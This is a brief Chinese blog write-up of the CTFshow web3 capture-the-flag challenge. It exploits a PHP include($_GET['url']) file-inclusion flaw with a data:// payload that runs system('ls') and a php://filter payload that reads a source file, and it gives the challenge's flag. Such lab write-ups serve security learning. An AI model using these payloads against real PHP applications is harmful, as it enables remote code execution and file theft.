首页 推荐 热点 专题 PHPJavaPythonAndriodIOSC#前端数据库人工智能程序开发架构安全运维资讯微课资源
0
点赞
收藏
分享

微信扫一扫

CTFshow WEB web3

未定义变量 2022-04-19 阅读 72
web安全

CTFshow WEB web3

  • 进入环境,题目提示存在文件包含漏洞

    <?php include($_GET['url']);?>

  • 使用PHP伪协议

    ?url=data://text/plain,<?php% system('ls');?>

ctf_go_go_go index.php

    ?url=php://filter/convert.base64-encode/resource=ctf_go_go_go

Y3Rmc2hvd3swNjNmNWZkYS0wZmU3LTQxOWYtYWFmMi01ZDZkMjY1OGJiZTJ9Cg==

    base64解密

    ctfshow{063f5fda-0fe7-419f-aaf2-5d6d2658bbe2}
举报
0 条评论
未定义变量
关注
  • shell中使用循环执行ssh时,执行一行就退出
  • 电子秤脂肪秤芯片方案CSU18M91
  • 深入探索Math.NET:开启高效数值计算之旅
  • 猫狗Java
  • MySQL底层概述—8.JOIN排序索引优化
  • PS3111量产工具固件合集,神储G7-120G固态硬盘PS3111量产开卡维修教程,支持983C98B37672
  • LLM实践系列-聊聊大模型SFT的数据清洗过程有多繁琐?
  • [Java]讲解@CallerSensitive注解
  • golang开发一个海盗王的登录更新器
  • RTS5765开卡工具下载及量产保姆级教程,RTS5765DL主控N38A颗粒成功开卡,RTS5765DL固件量产工具使用教程,RTS5766参考量产